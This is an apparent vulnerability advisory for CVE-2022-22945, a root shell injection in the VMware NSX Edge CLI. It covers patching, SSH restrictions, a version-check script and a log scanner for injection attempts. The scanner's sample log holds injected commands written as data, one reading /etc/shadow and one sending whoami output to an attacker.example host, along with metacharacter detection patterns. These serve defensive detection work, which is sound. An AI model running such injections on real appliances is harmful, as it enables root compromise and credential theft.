CVE-2022-22945
📋 TL;DR
CVE-2022-22945 is a CLI shell injection vulnerability in the VMware NSX Edge appliance, addressed in VMSA-2022-0005. An attacker who already holds SSH access to the appliance's command-line interface can break out of the CLI and execute arbitrary commands on the underlying operating system as root. It is a post-authentication privilege escalation: valid SSH credentials are the prerequisite, full control of the appliance is the outcome, and from there the attacker can reach every network the Edge connects.
💻 Affected Systems
- VMware NSX Edge
📦 What is this software?
VMware NSX Edge is the gateway appliance of VMware NSX. It sits at the boundary between the virtual networks NSX builds and the physical network, and provides routing, NAT, firewalling, load balancing and VPN services for those networks. Administrators manage it through a command-line interface reached over SSH or the console; that CLI is the interface this vulnerability abuses.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of an NSX Edge appliance that terminates traffic for the virtual networks it serves: lateral movement into every connected segment, interception or exfiltration of the traffic that transits the Edge, and disruption of routing, NAT, firewall and VPN services across the virtual infrastructure.
Likely Case
An attacker who already holds SSH credentials for the appliance (a compromised administrator account, a shared or weak CLI password) escalates from the CLI to root and installs persistence: a backdoor account or SSH key, a scheduled task, or a cryptocurrency miner.
If Mitigated
If SSH to the appliance is reachable only from a hardened administrative network and CLI accounts use strong, non-shared credentials, the flaw can only be exercised by an attacker who has already compromised an administrator, which limits both likelihood and blast radius. These controls reduce exposure; only the patch removes the vulnerability.
🎯 Exploit Status
Exploitation requires valid SSH credentials for the appliance; there is no unauthenticated path. Once authenticated, the injection is straightforward: the attacker supplies shell metacharacters in a CLI argument and the appliance runs the resulting command as root. Until the appliance is patched, treat every CLI user as an effective root user.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: NSX Edge 3.2.0 and later (confirm the exact fixed build for your release train against the vendor advisory before declaring an appliance fixed)
Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2022-0005.html
Restart Required: Yes
Instructions:
1. Download NSX Edge 3.2.0 or later from the VMware portal.
2. Deploy the updated appliance.
3. Migrate the configuration from the old appliance.
4. Verify the new appliance reports the fixed version with 'show version', then decommission the vulnerable appliance.
🔧 Temporary Workarounds
Restrict SSH Access
Limit SSH to the NSX Edge appliances to trusted administrative networks only. Apply this on the firewall or Linux host that fronts the management network; the appliance itself should be managed through its own CLI and management interface rather than by editing its guest OS. The iptables example below uses 192.0.2.0/24 as a placeholder for the admin network; replace it with your own CIDR and make sure these rules precede any broader ACCEPT rule in the INPUT chain.
# Allow SSH only from the admin network, then drop every other connection to port 22
iptables -A INPUT -p tcp --dport 22 -s 192.0.2.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j DROP
Disable SSH if Not Required
If remote CLI access is not needed for day-to-day operations, turn SSH off on the appliance. Prefer the SSH enable/disable control that NSX management provides for the Edge over modifying the appliance OS; the generic Linux commands below apply to a host where you have a root shell and are shown for completeness.
# Stop the SSH daemon now and keep it from starting at boot
systemctl stop sshd
systemctl disable sshd
🧯 If You Can't Patch
- Implement strict network segmentation to isolate NSX Edge appliances from untrusted networks.
- Enforce multi-factor authentication on the bastion or jump host through which administrators reach the appliances, since the appliance's own SSH login cannot be assumed to support it, and require strong, non-shared passwords for every CLI account.
🔍 How to Verify
Check if Vulnerable:
Run 'show version' on the appliance CLI, or read the version from the web interface. Per this page, versions before 3.2.0 are vulnerable; confirm the fixed build for your release train against the advisory.
Check Version:
show version
Verify Fix Applied:
Run 'show version' and confirm the reported version is 3.2.0 or later. When scripting this across a fleet, compare versions numerically rather than as strings, so that a later release with a two-digit minor or a long build suffix is not misread as older.
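Scripting the check across a fleet is where mistakes creep in: compared as strings, "3.10.0" sorts before "3.2.0". The Python below is an added example written for this page, not VMware tooling. It extracts the version from captured 'show version' output (the sample output is constructed and its layout is an assumption), converts it to a tuple of integers, and compares it against the fixed version this page states, which you should confirm against the advisory.

```python
import re

# Fixed version as given on this page ("3.2.0 and later"). Confirm the exact
# fixed build for your release train against VMSA-2022-0005 before relying on it.
FIXED_VERSION = "3.2.0"

# Constructed sample CLI output. The exact layout of "show version" on an
# NSX Edge is an assumption made for this example.
SAMPLE_SHOW_VERSION = """\
NSX Edge
Version: 3.1.3.0.0.18328989
"""


def parse_version(s: str) -> tuple[int, ...]:
    """Turn '3.1.3.0.0.18328989' into (3, 1, 3, 0, 0, 18328989).

    Comparing tuples of ints avoids the string-comparison bug where '3.10.0'
    sorts before '3.2.0'. Build suffixes become extra elements; Python ranks a
    shorter tuple as smaller when all leading parts are equal, so
    3.2.0.0.0.1 >= 3.2.0 holds as intended.
    """
    parts = re.findall(r"\d+", s)
    if not parts:
        raise ValueError(f"no version number found in {s!r}")
    return tuple(int(p) for p in parts)


def version_from_show_output(text: str) -> str:
    """Pull the version string out of captured 'show version' output."""
    m = re.search(r"^Version:\s*(\S+)", text, re.MULTILINE)
    if not m:
        raise ValueError("no 'Version:' line in output")
    return m.group(1)


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the running version is older than the first fixed version."""
    return parse_version(version) < parse_version(fixed)


if __name__ == "__main__":
    v = version_from_show_output(SAMPLE_SHOW_VERSION)
    print(f"{v}: {'VULNERABLE' if is_vulnerable(v) else 'fixed'}")
```

Feed it the output of 'show version' collected from each appliance; the sample above reports as vulnerable because 3.1.3 is older than 3.2.0 regardless of its build number.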
📡 Detection & Monitoring
Log Indicators:
- Unusual SSH login attempts to NSX Edge appliances
- CLI commands submitted over SSH whose arguments contain shell metacharacters (;, backtick, $( ), &&, ||, redirects)
- Processes spawned as root from the CLI session, or new root-owned users, SSH keys or scheduled tasks appearing on the appliance
Network Indicators:
- Unexpected outbound connections from NSX Edge appliances
- SSH brute force attempts against NSX Edge IPs
SIEM Query (the OR branches must be grouped, otherwise the metacharacter clauses match events from every source):
source="nsx-edge" AND event="cli_command" AND (command="*;*" OR command="*`*" OR command="*$(*" OR command="*&&*" OR command="*|*")
Expect the pipe clause to be the noisiest, since many CLIs accept "| grep" style output filters; tune or drop it once you know which filters your operators use.
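The log indicators above reduce to one check: does a CLI command submitted over SSH carry shell control characters? The Python below is an added example, not code from the original page or from VMware; it runs that check over constructed, syslog-style sample lines whose field layout (user=, cmd=) is an assumption, since the real NSX Edge log format is not shown here. A lone pipe is handled separately from the other metacharacters because CLIs commonly accept "| grep" style filters, and flagging every pipe floods the queue.

```python
import re

# Constructed sample log lines in a syslog-like layout. The field names
# (user=, cmd=) are an assumption for this example, not the NSX Edge format.
SAMPLE_LOG = """\
2022-02-16T10:01:02Z edge-01 cli: user=admin cmd="show version"
2022-02-16T10:01:09Z edge-01 cli: user=admin cmd="ping 10.0.0.1; id"
2022-02-16T10:01:15Z edge-01 cli: user=admin cmd="show ip route | grep 10.1"
2022-02-16T10:02:40Z edge-01 cli: user=admin cmd="ping $(cat /etc/shadow)"
2022-02-16T10:03:01Z edge-01 cli: user=admin cmd="traceroute `whoami`.attacker.example"
2022-02-16T10:03:30Z edge-01 cli: user=admin cmd="show log | count"
2022-02-16T10:04:00Z edge-01 sshd: Accepted password for admin from 203.0.113.5 port 51000 ssh2
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<host>\S+) cli: user=(?P<user>\S+) cmd="(?P<cmd>.*)"$'
)

# Characters that end one shell command and start another, or substitute a
# command's output into an argument. Any of these inside a CLI argument is
# the signature of an injection attempt against a CLI that shells out.
INJECTION_PATTERNS = {
    "semicolon": re.compile(r";"),
    "backtick": re.compile(r"`"),
    "dollar_subshell": re.compile(r"\$\("),
    "and_or_chain": re.compile(r"&&|\|\|"),
    "redirect": re.compile(r"[<>]"),
    "newline": re.compile(r"[\r\n]"),
}

# A single pipe is handled separately: CLIs commonly accept "| grep" style
# output filters, so only pipes to something outside this (hypothetical)
# allow-list are reported.
SINGLE_PIPE = re.compile(r"(?<!\|)\|(?!\|)")
ALLOWED_PIPE_TARGETS = {"grep", "count", "find", "more"}


def classify(cmd: str) -> list[str]:
    """Return the names of the injection indicators present in one CLI command."""
    hits = [name for name, pat in INJECTION_PATTERNS.items() if pat.search(cmd)]
    for m in SINGLE_PIPE.finditer(cmd):
        target = cmd[m.end():].strip().split(" ", 1)[0]
        if target not in ALLOWED_PIPE_TARGETS:
            hits.append("pipe")
            break
    return hits


def scan(log_text: str) -> list[dict]:
    """Parse the cli: events in a log and return one finding per suspicious command."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # sshd and other non-CLI events are not inspected here
        hits = classify(m["cmd"])
        if hits:
            findings.append(
                {"ts": m["ts"], "host": m["host"], "user": m["user"],
                 "cmd": m["cmd"], "indicators": hits}
            )
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']} user={f['user']} "
              f"cmd={f['cmd']!r} indicators={','.join(f['indicators'])}")
```

Run as-is, the scan reports three of the seven sample lines (the semicolon, the $( ) substitution and the backtick) and stays silent on the two legitimate "| grep" and "| count" filters. Adapt LINE_RE to the appliance's actual log layout and extend ALLOWED_PIPE_TARGETS with the filters your operators use before deploying the rule.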